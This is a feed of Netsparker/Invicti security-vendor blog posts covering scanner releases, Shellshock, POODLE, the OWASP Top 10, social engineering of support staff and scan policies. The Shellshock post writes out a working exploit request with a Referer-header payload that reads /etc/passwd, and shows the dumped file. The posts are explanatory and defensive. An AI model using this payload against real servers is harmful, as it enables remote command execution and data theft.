Quantcast
Channel: Invicti
Viewing all 1027 articles
Browse latest View live

More Efficient and Precise Web Security Scans with New Netsparker 3.5.5

0
0

A new update of Netsparker Web Application Security Scanner is available for download. This is a minor version update which includes a number of improvements and bug fixes that will improve the efficiency of web security scans.

More Efficient and Precise Scanning of Websites Using URL Rewrite

When using the wizard to configure URL rewrite rules now you can specify the type of the parameter as highlighted in the below screenshot.

Configuring URL Rewrite Rules in Netsparker using the wizard to scan websites using URL Rewrite Rules

Once you specify a parameter type Netsparker will automatically fine tune the regular expression so no extra HTTP requests are sent during a web vulnerability scan. The end result? More efficient and precise web security scans that consume less bandwidth.

Improved DOM Cross-site Scripting Scanner and DOM Parser

In the previous version of Netsparker we launched the all new DOM parser and DOM XSS scanner, enabling Netsparker to detect DOM based cross-site scripting vulnerabilities, which are relatively common in modern HTML5 web applications.

We have already learnt a lot and for this version we optimized both the DOM parser and the DOM XSS scanner to ensure they work more efficiently and detect more variants of the DOM based vulnerabilities.

Since both the DOM parser and scanner are now more efficient, scanning of DOM based cross-site scripting vulnerabilities is now included by default in the built-in scan policies.

Netsparker Version 3.5.5 Change Log

Apart from the above major updates, Netsparker 3.5.5 includes several other improvements and a number of bug fixes. For more detailed information refer to the Netsparker 3.5.5 change log.

Upgrading Netsparker Web Application Security Scanner

If you are already using Netsparker Web Application Security Scanner, a pop up window with the upgrade details will pop up the next time you run Netsparker. Alternatively you can always click Check for Updates from the Help drop down menu to force manual updates.

If you have problems with the upgrade or product related queries, get in touch with our awesome support team by sending us an email on support@netsparker.com.


Latest Vulnerability Checks Added to Netsparker Community Edition

0
0

We are happy to announce a new updated version of Netsparker Community Edition, the community’s favourite free XSS and SQL Injection web application security scanner.

What is New in Netsparker Community Edition?

This update of Netsparker CE includes all of the scanning engine and product updates, and bug fixes released between versions 3.1.7 and version 3.5.5 of the commercial editions of Netsparker Web Application Security Scanner. This means that now you can use Netsparker CE version 3.5.8 to identify the latest variants of both SQL Injection and Cross-site Scripting vulnerabilities on your websites.

Identify SQL Injection and XSS Vulnerabilities Automatically

Netsparker Community Edition enables you or any member of your team to get an overview of the security state of your websites and web applications before hackers do within a few minutes. In fact web application security expert Troy Hunt said in a product review that Netsparker is just so damn easy to get started with. So what are you waiting for? Download Netsparker Community Edition and scan your websites and uncover vulnerabilities that might leave you and your business exposed before malicious hackers uncover them for you and exploit them.

Download a Netsparker Demo

If you would like to run a full scan of your websites and check them for all types of web application vulnerabilities and security issues you can download a DEMO of Netsparker Web Application Security Scanner. Once you download the demo we will get in touch with you to help you through the evaluation process. Should you have any queries you can always get in touch with us.

Shellshock Bash Remote Code Execution Vulnerability Explained and How to Detect It

0
0

Shellshock is the latest vulnerability that most probably will be as popular if not more than the Heartbleed vulnerability, hence it is already being widely exploited via a worm called wopbot. It gained so much popularity from the fact that the vulnerability is found in Unix Bash shell, which can be found on almost every Unix / Linux based web server, server and network device.

What is the Shellshock Remote Code Execution Vulnerability?

Shellshock is a security bug causing Bash to execute commands from environment variables unintentionally. In other words if exploited the vulnerability allows the attacker to remotely issue commands on the server, also known as remote code execution. Even though Bash is not an internet-facing service, many internet and network services such as web servers use environment variables to communicate with the server’s operating system.

Since the environment variables are not sanitized properly by Bash before being executed, the attacker can send commands to the server through HTTP requests and get them executed by the web server operating system. The shellshock vulnerability, discovered by Stephane Chazelas was assigned the CVE identifier CVE-2014-6271. A similar bug with identical consequences was discovered by Tavis Ormandy and was assigned the CVE identifier CVE-2014-7169.

Exploiting Shellshock Vulnerability Using HTTP Requests

Many are concerned because the Shellshock vulnerability is very easy to exploit through web applications running on vulnerable servers as shown in the following example. The attacker crafts an HTTP request that contains the below headers:

GET http://shellshock.testsparker.com/cgi-bin/netsparker.cgi HTTP/1.1
User-Agent: Netsparker
Host: shellshock.testsparker.com
Referer: () { :;}; echo "NS:" $(</etc/passwd)

Once the target server receives the HTTP request with the above headers, it responds by sending the content of the file /etc/passwd, as seen in the below HTTP response:

HTTP/1.0 200 OK
Server: nginx/1.2.1
Date: Fri, 26 Sep 2014 11:22:43 GMT
Content-Type: text/html
NS: root:x:0:0:root:/root:/bin/bash
daemon: x:1:1:daemon:/usr/sbin:/bin/sh
bin: x:2:2:bin:/bin:/bin/sh
sys: x:3:3:sys:/dev:/bin/sh
sync: x:4:65534:sync:/bin:/bin/sync
games: x:5:60:games:/usr/games:/bin/sh
man: x:6:12:man:/var/cache/man:/bin/sh
lp: x:7:7:lp:/var/spool/lpd:/bin/sh
mail: x:8:8:mail:/var/mail:/bin/sh
news: x:9:9:news:/var/spool/news:/bin/sh
uucp: x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy: x:13:13:proxy:/bin:/bin/sh
www-data: x:33:33:www-data:/var/www:/bin/sh
backup: x:34:34:backup:/var/backups:/bin/sh
list: x:38:38:Mailing List Manager:/var/list:/bin/sh
irc: x:39:39:ircd:/var/run/ircd:/bin/sh
gnats: x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody: x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid: x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim: x:101:103::/var/spool/exim4:/bin/false
messagebus: x:102:106::/var/run/dbus:/bin/false
avahi: x:103:107:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
sshd: x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql: x:105:111:MySQL Server,,,:/nonexistent:/bin/false
Connection: close

What does this mean? The attacker was able to execute operating system commands through an HTTP request. An attacker can use any other command that allows him to take full control of the server.

Scan Your Websites for the Shellshock Vulnerability Automatically

The latest version of Netsparker Web Application Security Scanner will automatically identify if your web application is vulnerable to Shellshock Bash vulnerability as seen in the below screenshot.

Shellshock

Upon identifying the vulnerability Netsparker will also confirm the vulnerability automatically, thus ensuring it is not a false positive. Netsparker also allows the users to manually exploit the vulnerability as seen in the above screenshot.

Updating Netsparker Web Application Security Scanner

If you are already using Netsparker, upon starting up the scanner it will automatically check for updates and alert you to download the latest update. Alternatively launch Netsparker and click Check for Updates from the Help drop down menu.

Free Shellshock Vulnerability Scan

If you are not a Netsparker customer, you can still find out if your web server is vulnerable to Shellshock vulnerability by scanning it with Netsparker Community Edition, our free SQL Injection and XSS vulnerability scanner.

For more detailed information about the Shellsock vulnerability refer to the Shellshock article on Wikipedia.

Free Shellshock Bash Vulnerability Scans with Netsparker Community Edition

0
0

Most probably by now you already heard about the Shellshock vulnerability. Considering how many servers and and internet facing devices are vulnerable to such vulnerability, and how easy it is to exploit it we added the Shellshock vulnerability check in our free security scanner Netsparker Community Edition. Therefore we are giving everyone the opportunity to find out if their web environment is vulnerable to this critical vulnerability.

Scan for Shellshock Bash Vulnerability for Free

If you would like to find out if your web servers are vulnerable to Shellshock vulnerability download the free Netsparker Community Edition web security scanner and scan your websites.

Shellshock

An Automated Scanner That Finds All OWASP Top 10 Security Flaws, Really?

0
0

Many security software vendors claim that their web application security scanner can identify all vulnerabilities in the OWASP Top 10. How true is such a claim?

A question we are typically asked is if Netsparker Web Application Security Scanner can detect all vulnerabilities and security flaws listed in the OWASP Top 10. Many are lead to believe, and told that some automated web application security scanners can detect all vulnerabilities and security issues listed in the OWASP Top 10.

I have personally seen responses from security software companies stating that their web vulnerability scanner, or network scanner can detect all vulnerabilities listed in the OWASP Top 10. To start off with let us be clear, such statements are not true. There is no automated tool that can detect all security flaws listed in the OWASP top 10.

Apart from the fact that such statements are not true, they are also misleading security professionals and decision makers. But simply answering the question is not enough. This article goes into the details and explains why no security software can automatically identify all vulnerabilities listed in the OWASP Top 10 list.

What is the OWASP Top 10 List?

For those who are new in the web application security field; OWASP is short for Open Web Application Security Project. OWASP is a non profit organization that raises web application security awareness. Every three years OWASP publishes the OWASP Top 10 list. The list highlights the most commonly exploited vulnerabilities and security problems found in websites and web applications.

The list as such is not the holy grail for web application security experts, but it servse as guidelines for organizations to ensure their web applications are not vulnerable to these most commonly exploited vulnerabilities and web application security issues. In fact there are many other vulnerabilities and security issues that can be found in web applications that are not listed in the OWASP Top 10 lists, and ideally all of them should be addressed with time.

Understanding All the Security Flaws in the OWASP Top 10

A1 - Injection

The first in the list are injection vulnerabilities such as SQL Injection and OS Command injection. Such vulnerabilities are technical vulnerabilities and can be detected by an automated web application security scanner, or as also known web vulnerability scanner.

A2 - Broken Authentication and Session Management

Second in the list are authentication and session management security issues. Unlike A1, A2 does not refer to a specific list of vulnerabilities, but addresses a number of security issues related to the design of the web application that might lead to authentication vulnerabilities.

This is the first category in the OWASP Top 10 list which lists a number of security issues that CANNOT be automatically identified by a web vulnerability scanner. For example insecure storage of user credentials; credentials are stored in clear text and are not protected using hashing or encrypted when stored in the backend database. An automated web vulnerability scanner, or any other automated security tool can never determine how user authentication details are stored in your web application’s backend database. Such checks can only be done manually by a human.

Having said that some of the security issues listed in this category can be identified automatically by web application security scanners. For example session IDs exposed in URLs, or the transmission of usernames and passwords over an unencrypted connection.

A3 - Cross-Site Scripting (XSS)

There are many different variants of cross-site scripting vulnerabilities such as reflected, persistent and DOM XSS.  Since all of them are technical vulnerabilities, they can  all be detected by using an automated web application security scanner. Though before choosing your web application security scanner make sure you properly test it because some of them have a number of shortcomings, especially when it comes to detecting DOM XSS vulnerabilities.

A4 - Insecure Direct Object references

Category A4 refers to a number of logical security problems in web applications. Logical issues; this is already an indication that such type of security issues cannot be detected by automated web vulnerability scanners as explained in the section Identifying Logical Vulnerabilities of the web application security getting started guide.

This category refers to a number of security issues where typically a sensitive object or resource is not protected properly. For example a user account has access to information he or she should not have access to. To prevent such problem the application should verify if the authenticated user has access to such resource before allowing the user to access it. Such type of problem can never be identified by an automated tool because tools cannot determine if a specific user should have access to a specific resource or not. Only a person who is familiar with the operations and business scope of the web application can determine who should be able to access what.

A5 - Security Misconfiguration

This category refers to a number of security issues which are the result of a misconfiguration in the server or the software and framework being used. Most of these security issues can be automatically identified with an automated web vulnerability scanner, though most of them still need to be verified by a human who is familiar with the web application before being confirmed as security issues, as explained below.

Unnecessary network services: You can identify running network services such as FTP, DNS and SMTP on your web server by using a port scanner. The scanner will report the open ports but it is up to you to determine if the reported network services are needed or not.

Out of Date Software: A web vulnerability scanner will alert you if any of the software being used to run your web application is outdated and most probably vulnerable. A scanner can also identify the web server version, the development framework (php, .NET etc) version and even the version of well known web applications such as WordPress, Drupal etc.

Security Settings of Development framework: A web vulnerability scanner can also notify you of some configuration issues in development frameworks that might leave your web application exposed to malicious hack attacks. For example a scanner will alert you if debugging is enabled, or if error messages disclose sensitive information.

Default Accounts and Passwords: By default web vulnerability scanners do launch brute force attacks against login forms using a dictionary, and in fact weak credentials will be identified. Though of course this is limited to what you are scanning. For example if you use weak credentials to access the web server itself, the scanner will never be able to identify them. Hence why it is important to audit every component that make up your web farm.

A6 - Sensitive Data Exposure

The criticality of the security issues listed in this category vary depending on the organization’s scope; while some data is considered as sensitive by a particular business, it might not be sensitive for other businesses. Hence most of the security issues in this category cannot be identified automatically with security tools because it is impossible to cater for all cases, or alternatively you will be flooded with false positives.

Only a person who is familiar with the scope of the web application is in a position to be able to determine if some data should be available to the visitors or a specific user. Though having said that, there is data that is always considered as sensitive and automated scanners can identify it, such as cardholder data, social security numbers, users’ credentials and similar data.

A7 - Missing Function Level Access Control

Category A7 refers to access control. For example do users have to be authenticated to access an admin portal or it can be accessed anonymously? Though this category is not just about admin portals. For example looking at web based finance solutions, are the accounts clerks or bookkeepers able to access all the records that are typically reserved to financial controllers only? Ideally they should not.

Hence like in the previous category, not all  security issues in this category can be identified with an automated web application security scanner. If an admin portal is accessible anonymously most probably an automated tool will advise you of such problem, because it can notice a specific pattern in the URL, such as /admin/ or /private/. But the tool won’t alert you if a logged in user can see records that he should not be able to see, or is able to access specific sections of the website that he should not.

As per the above example, an automated tool cannot differentiate between what a bookkeeper and a financial controller should see, hence such type of security issues or vulnerabilities cannot be identified automatically. They can only be identified manually, and even so, unless the penetration tester is familiar with the scope of the web application being auditing it is very difficult to highlight such problems.

A8 - Cross-site Request Forgery

Cross-site Request Forgery (CSRF) vulnerability is the opposite of cross-site scripting vulnerability, where the trust that a site has in a user’s browser is exploited rather than the user’s trust in a site. When exploited malicious requests are sent to the web application from the user’s browser without the user’s consent.

Typically CSRF vulnerabilities can be automatically identified though to protect from CSRF attacks developers implement anti-CSRF tokens in web applications. Because of these tokens scanners are unable to detect other vulnerabilities listed in the OWASP Top 10, such as XSS and SQL Injection. Therefore many automated web vulnerability scanners recommend users to disable these anti-CSRF tokens while scanning the website, and funnily enough then the same scanners raise alerts that no Anti-CSRF tokens were found.

Netsparker has inbuilt anti-CSRF token support, therefore it is possible to scan websites and automatically detect vulnerabilities without the need to disable anti-CSRF tokens, hence allowing you to scan real live scenarios sites.

A9 - Using Components with Known Vulnerabilities

This is most probably common sense for many security people out there but you would be surprised by how many people still run old and vulnerable software.

Web vulnerability scanners do run a number of checks to verify if the web server, database server and other server components that you are running are not vulnerable to any known vulnerabilities. Typically automated scanners also have a number of checks for well known web applications and components, such as WordPress, Joomla!, Drupal etc.

Though it is virtually impossible for a web vulnerability scanner to have a list of all possible vulnerable components and software, therefore it is up to you to ensure that you always use the latest version of a particular software.

A10 - Unvalidated Redirect and Forwards

The last category of the OWASP Top 10 refers to unvalidated redirects and forwards, also known as open redirects. These happen when the web application tries to automatically redirect or forward the visitor to a specific URL, though such URL can be tampered with, thus risking of forwarding the visitor to a malicious website.

For example imagine you have to select a language upon visiting a website so you are automatically redirected to that specific language website. Let’s say you have chosen English, then the website will automatically populate the address parameter in the example URL below with the URL of the english website.

http://www.example.com/redirect.php?address=en.example.com

In such cases, if the attacker can change the URL in the address parameter to another URL then the target website is vulnerable to unvalidated redirects and forwards. In most cases web vulnerability scanners can identify such security issues automatically.

Identifying All Security Issues and Vulnerabilities from OWASP Top 10 in Your Websites

As this article explains there are some vulnerabilities and security flaws from the OWASP Top 10 list that can be identified with an automated web application security scanner while others that cannot. To ensure that all web application vulnerabilities are identified on your websites use a mix of both, i.e. use the automated tools and also do a manual penetration test. As we have seen from some of the vulnerabilities mentioned above it is also important that the person doing the manual audit is also familiar with the business scope of the web application, else not all security issues will be identified, especially the logical ones.

Oh, and by the way, the next time someone tells you that their scanner can identify all vulnerabilities listed in the OWASP Top 10 list automatically tell them to stop fooling around and send them the link of this article. Alternatively ask them to send you a report that shows that their tool actually did identify all vulnerability and security issues variants mentioned in the OWASP Top 10 list.

POODLE SSL Vulnerability - The End of Life for SSL 3.0

0
0

Yesterday a trio of Google researchers published the details of a new security vulnerability in SSL 3.0. The new vulnerability, which is called POODLE (short for Padding Oracle On Downgraded Legacy Encryption) allows an attacker to break the cryptographic security of SSL 3.0 when exploited, thus allowing him to use the data passing on a secure channel to his advantage and to craft further attacks.

It is important to point out that SSL 3.0 is 15 years old and even though there are several other and much improved successors, support for it remains widespread. And the fact that the majority of the web servers on the internet still support SSL 3.0 makes this vulnerability very  popular and critical.

How Does the POODLE Vulnerability Work?

When you access a website over SSL/TLS, the client (in most cases a browser) and the server have to agree on which version of encryption protocol to use throughout the session. The process starts when the server recommends the client to use the highest encryption protocol version supported. Should the client not support the highest encryption protocol version, the server recommends an earlier version of the protocol. This process, which is called downgrade dance will continue looping until a version of the encryption protocol that both server and client support is established.

The downgrade dance process can be triggered by active attackers or by network glitches. Since attackers know that there is a vulnerability in SSL 3.0 they use this downgrade dance during a man in the middle attack against the victim, who is accessing the web application running on the server.

If the man in the middle attack is successful and an SSL 3.0 connection is established the attacker can exploit the POODLE vulnerability against the captured encrypted packets and retrieve data from them thus allowing the attacker to hijack web sessions.

For more details about the POODLE vulnerability you can refer to the official POODLE SSL vulnerability documentation.

How Critical is the POODLE Vulnerability?

The POODLE vulnerability is critical though not as critical as the Heartbleed vulnerability, the previous SSL vulnerability that sent the security industry into a panic mode. While Heartbleed could be exploited by sending requests directly to the server, to exploit the POODLE vulnerability one must have control over the connection between the victim and the server and launch a man in the middle attack, which is not as such a straightforward process that can be automated.

Therefore the chances of someone widely exploiting the POODLE vulnerability are almost negligible. Still this does not mean that you should not take any action to ensure that your web servers are not vulnerable to the POODLE vulnerability.

Are Your Web Servers Vulnerable to the POODLE Bug?

The chances that your web servers are vulnerable to the POODLE vulnerability are very high because as explained before support for SSL 3.0 is still very popular. To find out if they are scan your web servers with the latest version of Netsparker Web Application Security Scanner, which includes the check for the POODLE bug.

The POODLE SSL vulnerability detected by Netsparker Web Application Security Scanner

Netsparker Version 3.5.12 Changelog

Apart from the security check for the POODLE vulnerability, the latest version of Netsparker also includes a number of bug fixes. Refer to the Netsparker changelog for more detailed information.

Updating Netsparker Web Application Security Scanner

If you are already using Netsparker Web Application Security Scanner, a pop up window with the update details will pop up the next time you run Netsparker. Alternatively you can always click Check for Updates from the Help drop down menu to force manual updates.
 
If you have problems with the updating process or have product related queries, get in touch with our awesome support team by sending us an email on support@netsparker.com.

Integrating Netsparker in Your Vulnerability Management Solution

0
0

Yesterday we announced a new strategic partnership with Lunarline. This partnership means that web security scan results generated by Netsparker Web Application Security Scanner can be imported into Lunarline’s vulnerability management solution Vulnerability Scan Converter.

What is Vulnerability Management Software?

Vulnerability management software allows security professionals to import scan results generated from different automated security scanners in a centralized location, allowing better management of the whole security program.

There are several reasons why security professionals use vulnerability management software. First off, many security professionals do not focus solely on web application security, but also on network, server and any other type of security. Therefore when using different automated tools to scan different components in an organization’s IT infrastructure they end up with a good number of separate reports. By importing all the scan results to a vulnerability management software security professionals centralize all their reports hence can have a better overview of the security state of a whole infrastructure and ease the job of remediating the security flaws.

There are also security professionals who use different scanners against the same target and by doing so the information they have in their reports overlap. To ensure they get the best out of their reports and ensure there is no repetitive work they import the scan results in a vulnerability management software which allows them to iron out all of the overlapping information.

Netsparker Integration with Vulnerability Management Solutions

At Netsparker we understand that some of our users are not just responsible for the security of their web applications. Hence we partnered with a number of vulnerability management software vendors to ensure that they have a good number of solutions from where to choose from. Currently all of the below listed solutions can be used to import Netsparker’s scan results:

    • Threadfix Vulnerability Manager
    • Risk I/O Vulnerability Dashboard
    • LunarLine Vulnerability Scan Converter
    • Dradis Framework

If you use a vulnerability management solution that is not listed above, contact your vendor so they can get in touch with us and we can partner with them.

Centralizing Web Security Scan Results

If you are responsible for the security of many websites and web applications and would like to centralize all the web application security scan results you can also use Netsparker Cloud, our new online web application security scanner that is specifically tailored to help organizations manage the security of their websites and web applications.

Social Hacking of Support and Implementation Teams

0
0

Support, customer service and implementation teams are the human gateways into many systems. Because they are human, with regular access to some of the most sensitive information for a business, they pose a special security risk from two kinds of behaviour: malicious behaviours, intended to exploit the system in some way, and innocent behaviours, which place the system at risk as a by-product, rather than a goal. In this article, we will focus on malicious behaviours and how to defend against them.

Social Engineering Customer Facing and Operations Teams

The dangers of malicious behaviour initiated purposely by an employee of customer facing and operations teams are obvious – but they are not unique to them. It is the high risk of being tricked into these behaviours by a second party – social engineering hacks – that makes these teams a special security weak point, as they have more direct contact with users than members of any other team and so present tempting targets. They also expect to be contacted by strangers, whereas other teams may become suspicious as soon as they are approached and be on guard for every unexpected interaction. So while general engineering techniques such as fake surveys can be used against all teams, user-targeting hacks - an attempt to hack a single user’s account - are most likely to utilize these customer facing teams.

Social engineering takes advantage of support and implementation employees to hack user accounts without investing in it technologically. Sometimes, hackers take advantage of errors in the rules that these teams are following; sometimes the rules are correct, but team members bend them out of a desire to help or through being manipulated and talked or pressured into a mistake.

Why the Rules Do Not Always Protect You

As an example of rules failing,Scott Hanselman's hacker got Amazon to send Mr Hanselman a new Kindle, and then changed the shipping address away from Mr Hanselman. The address change should not have been possible and was refused several times, but the hacker called again and again until he found a representative more eager to help than to follow the rules. Mr Hanselman also notes that the hacker was not asked to log onto Amazon to prove he had access to the account, nor did some of his suspicious requests – such as trying to eliminate a paper trail – raise a red flag.

Sometimes, the problem isn’t with one company’s rules or behaviours, so much as with the way that different companies reveal or request different information. Contradictory rules were at the base of the Mat Honan and Gizmodo hack from 2012, one of the best known examples of this sort of hacking. As Mr Honan puts it, “the very four digits that Amazon considers unimportant enough to display in the clear on the web are precisely the same ones that Apple considers secure enough to perform identity verification.” His hacker used two companies’ by-the-book actions to gain access to two accounts, based on the differences in what these companies considered private and hard-to-get information.

Both of these hackers used some information they had about their victim, and a lot of information about which rules can be exploited and which can be overcome with enough effort. That is the essence of social engineering.

How Implementation Teams can Be Socially Engineered

You might think that implementation, as it is on-site and often face-to-face with users, cannot be exploited by social engineering as it relies on impersonating a stranger. But since implementation workers are often away from the office and moving between different sites, it can be quite easy for a hacker to pretend to be not an anonymous user but a fellow-employee, or an employee of the client, who has simply not met the implementation worker before. Using supposed familiarity can help the hacker lower the implementation worker’s defences. Additionally, real employees that are well known to implementation teams may gain access to information they should not be able to see, and then pass it on for profit.

Defending Against Social Engineering Attacks

So we can see that avoiding social engineering hacks requires two things: correct rules, and a willingness to follow them even when the user sounds distressed or simply very innocent and convincing, and especially when the user is known to the customer facing teams.

What forms a “correct” rule, or set of rules? At its base, exploitation of employees uses the inherent difficulty of verifying a person’s right to access information. The two sides of the equation, then, are the identity of the person and the information supplied to that person. A correct set of rules would seek to reveal as little information as possible, in exchange for as much identifying information as feasible. Keep three assumptions in mind at all times: you cannot really predict what hackers may find beneficial in the information your employees disclose; no single piece of identifying information is proof of identity; and some of the things you consider to be separate pieces of identity are all discoverable from a single source.

But the rules, as we said, are not enough. Employees must also stick to the rules despite the pressures or apparent distress of the user. And most of all, employees should use their common sense and pay attention to suspicious behaviour. If they flag a user, they may be able to prevent that user taking advantage of a fellow employee. In Mr Hanselman’s case, it took the hacker several tries to change the shipping address on the order. Any one of those tries could have flagged the hacker as behaving suspiciously, and a string of these flags should have stopped the shipment. Similarly, in Mr Honan’s case, the hacker made two calls – one to supply a new credit card number, one to use that number to verify his identity and so gain access to the account. Paying attention to this string of calls could have prevented the hack.

Employees should also feel confident that if they stick to the rules, they will receive backing from their bosses even if the user is not a hacker and complains about the lack of assistance. And, if you are measuring your employees by how many calls they handle, you should be aware that the time pressure makes it more likely that they will make mistakes such as give the hacker hints about security questions, reveal too much information before verifying identity and agree to perform actions that break the rules.

Summary

This post provided only a glimpse of social engineering. There are multiple techniques for this form of hacking, and multiple goals, from hacking your company to hacking your users’ accounts. Defending against all of them is difficult, but educating yourself and your support, customer service and implementation teams about social engineering – especially the need to be critical and on guard – is a good place to start.


ISO 27001 Certified PCI DSS QSA Detects Vulnerabilities and Security Flaws with Netsparker

0
0

About 4 years ago, my team brought Netsparker to my attention and we took it for a spin during a real live penetration test.  It did outperform the other established tools we were using in terms of ease of use and also web application vulnerabilities detection rate. It was a breath of fresh air. We found it to be a light, fast and reliable tool with hassle free licensing.K. K. Mookhey, Network Intelligence’s Founder & Director

NII Consulting LogoNetwork Intelligence is an ISO 27001 certified PCI DSS QSA, and a well-established provider of information security services and products. Established in 2001, Network Intelligence has a strong reputation of providing top notch information security consultancy, 24/7 security monitoring, and product implementation services to industry leaders both in the Asia-Pacific region as well as other parts of the globe. Their client list includes companies across several different verticals such as banking and financial services, software services, pharmaceutical, telecom, and manufacturing, e-commerce, and government departments.

A Requirement to Identify All Web Application Vulnerabilities

The requirement that Network Intelligence had when it comes to web application security scanning and services was very simple; identify all web application vulnerabilities and security flaws. Easier said than done one must note.

The Responsibilities of Web Application Security Services

Network Intelligence’s primary source of income and forte are web application security services. They do penetration tests and identify vulnerabilities and security flaws in their customers’ websites. Such a job has a lot of responsibilities; they cannot afford to miss a vulnerability because if the customer’s website is hacked, the repercussions can have catastrophic effect on their business.

Keeping Up with the Demand Whilst Delivering Top Quality Services

Even though Network Intelligence always did a meticulous job and left no stone unturned when doing a penetration test they couldn’t not automate some of the processes, especially if they wanted to keep the competitive pricing and keep up with the demand. And that is what they did early in the days, they have been using automated web security tools for a good number of years now. Though they encountered a number of problems throughout the years which they continuously tried to address.

Most of the security tools they used were cryptic and difficult to use. Some had a better vulnerability detection rate than the others but none of them really did the job properly, not to mention that most of them reported false positives. Hence their concern was that they are spending more time getting bogged down with the configuration of the tools and verifying their results rather than doing the job and providing the customer with an affordable service and accurate security report.

Solving the Web Application Security Problem

“Throughout the years we used a number of automated security tools but we were never really satisfied with their overall performance, hence as soon as we got to know about a new automated web application security scanner we wanted to test it to see if it can perform better than the tools we were already using,” said K. K. Mookhey, Network Intelligence’s Founder & Director. “About 4 years ago, my team brought Netsparker to my attention and we took it for a spin during a real live penetration test.  It did outperform the other established tools we were using in terms of ease of use and also web application vulnerabilities detection rate. It was a breath of fresh air. We found it to be a light, fast and reliable tool with hassle free licensing.”

Growing With Netsparker Web Application Security Scanner

Network Intelligence have been using Netsparker for over 4 years in conjunction with another tool or two, but most of the other automated tools were ditched because “Netsparker was the perfect match” says KK. Nowadays Network Intelligence scans thousands of websites and custom built web applications each year and can only keep up with the demand and detect all technical web application vulnerabilities and security flaws thanks to Netsparker’s automation.

“The exploitation engine is a very handy tool,” added Taufiq Ali, Manager (Security Assessment) at NII. “We use it to validate the issues there and then and to also show the customers the impact a vulnerability can have without having to set up a simulation in a lab."

Supporting Varieties of Web Servers and Frameworks

The web application industry is a very dynamic one; there is a wide variety of web server software to choose from, and a much better choice when it comes to web frameworks and development languages. And the list keeps on growing every few years, if not months!

Hence with such a wide variety of customers from different verticals, Network Intelligence encounters them all; Apache, NginX, IIS, Tomcat, JAVA, PHP, .NET, JSF and many others. This was another deciding factor they had when choosing an automated tool. Could Netsparker scan all these different web applications built with different frameworks and running on a variety of web servers? Well, the answer is clear in this case study; Network Intelligence have been using Netsparker for over 4 years now.

Having a Web Application Security Expert to Rely On

As most professionals known having good software is nothing without good support, especially in the web security industry. Things can get quite complicated and you do not want to end up with your back against the wall while working on some critical penetration test. And this is another reason why Network Intelligence stuck to Netsparker. As KK says “the support from Ferruh and his team has always been very positive. The responses are almost prompt and always appropriate.”

About Netsparker Web Application Security Scanner

Netsparker Web Application Security Scanner is an industry leading automated web application security scanner developed by Netsparker Ltd. Netsparker management and engineers have more than a decade of experience in the web application security industry that is reflected in their product. Netsparker is a very easy to use web application security scanner that automates most of the web application security scanning. An out of the box installation of Netsparker is able to scan a wide variety of web applications, therefore web security experts, penetration testers and QA engineers do not need to spend countless amount of hours tweaking and configuring the software. Netsparker is revolutionising web application security by being the only web application security scanner to automatically verify detected web vulnerabilities, thus reporting no false positives. Netsparker is used by world renowned companies such as Samsung, NASA, Skype, ING, ISACA and Ernst & Young.

About NII Consulting

Network Intelligence is an ISO 27001 certified PCI DSS QSA, well-established provider of information security services and products from India. Incorporated in July 2001, we have established a reputation of providing top notch information security consultancy to industry leaders both in the Asia-Pacific region as well as other parts of the globe. Our client list includes companies across verticals such as banking and financial services, software services, pharmaceutical, telecom, manufacturing, e-commerce, and government departments. Our consultants possess the requisite industry certifications, but more importantly they are equipped with a wide range of skills covering different technologies and environments.

Optimize Netsparker Scan Policies for Quicker and More Efficient Web Application Security Scans

0
0

There are many factors that can affect the efficiency and duration of a web application security scan as explained in the article how fast is your web application security scanner. One of the factors that most probably have the biggest impact are the security and vulnerability checks that are launched during the security scan, which can be preconfigured in scan policies. For example it is much quicker to scan a web application for cross-site scripting vulnerabilities only rather than for both XSS and SQL Injection vulnerabilities.

Though under the hood things are not that simple. In reality Netsparker Web Application Security Scanner does not only check for a few well known vulnerabilities that are listed in the OWASP Top 10. It also has a number of security checks for the operating system of the web server, for the web server itself, for the web application framework and much more. This article explains how you can fine tune the Netsparker scan policies to reduce the duration of a web application security scan. You can also apply the same concepts on our online web application security scanner Netsparker Cloud. The only difference is that the interface is a bit different from the one shown below.

Why Should You Configure Security Checks in Netsparker?

The easiest way to launch a scan is to enter the URL and accept all the defaults. In a default web application security scan the All Security Checks scan policy is used. This means that the scanner will scan your website for any type of known vulnerability, irrelevant of the technology your website is running on. In most cases such approach should not be a problem, but what if you are pressed for time and have limited resources, especially in terms of hardware, server resources and bandwidth? What if you have a complex website and it is taking you too long to identify all security flaws and vulnerabilities?

In such case you need the web application security scans to be quick, efficient and avoid any possibility of disrupting the service. The best way to optimize web application security scans is to only scan your websites and web applications against threats and vulnerabilities they might be vulnerable to. For example if you are using a Microsoft SQL Server it does not make sense to also launch MySQL server checks. After all such checks will only consume more resources and bandwidth. Let’s dig a bit deeper in this subject and see how you can configure Netsparker to get the best out of it.

Built In Scan Policies in Netsparker

Netsparker has a number of built in scan policies that if used correctly can already give you a head start when it comes to reducing the scan duration. Below is a short introduction about each of the default scan policies:

All Security Checks

This scanning profile contains all the typical security checks. If you are not sure what type of web server and database backends are being used on the target, you can select this scan policy. This means that the target website will be scanned for all types of vulnerabilities. If you know the type of database backend being used you should select one of the below builtin scan policies which are specifically targeted to specific technologies. Therefore they consume less resources and bandwidth and take less time to complete.

All Security Checks (MS SQL)

This contains the same security and vulnerability checks as the All Security Checks scan policy but the SQL Injection checks are only for Microsoft SQL Server.

All Security Checks (MySQL)

This contains the same security and vulnerability checks as the All Security Checks scan policy but the SQL Injection checks are only for MySQL server.

All Security Checks (Oracle)

This contains the same security and vulnerability checks as the All Security Checks scan policy but the SQL Injection checks are only for Oracle database server.

All Security Checks (PostgreSQL)

This contains the same security and vulnerability checks as the All Security Checks scan policy but the SQL Injection checks are only for PostgreSQL database server.

Extensive Security Checks

This scan policy contains all the security checks included in the All Security Checks scan policy and some other attack patterns that are not too common and typically are mostly edge case scenarios. Mainly it includes extra DOM XSS vulnerability and Local File Inclusion checks. Because of the nature of such vulnerability checks, when scanning for these vulnerabilities the scan can take a considerable amount of time.

Fine Tuning Web Application Scan Policies

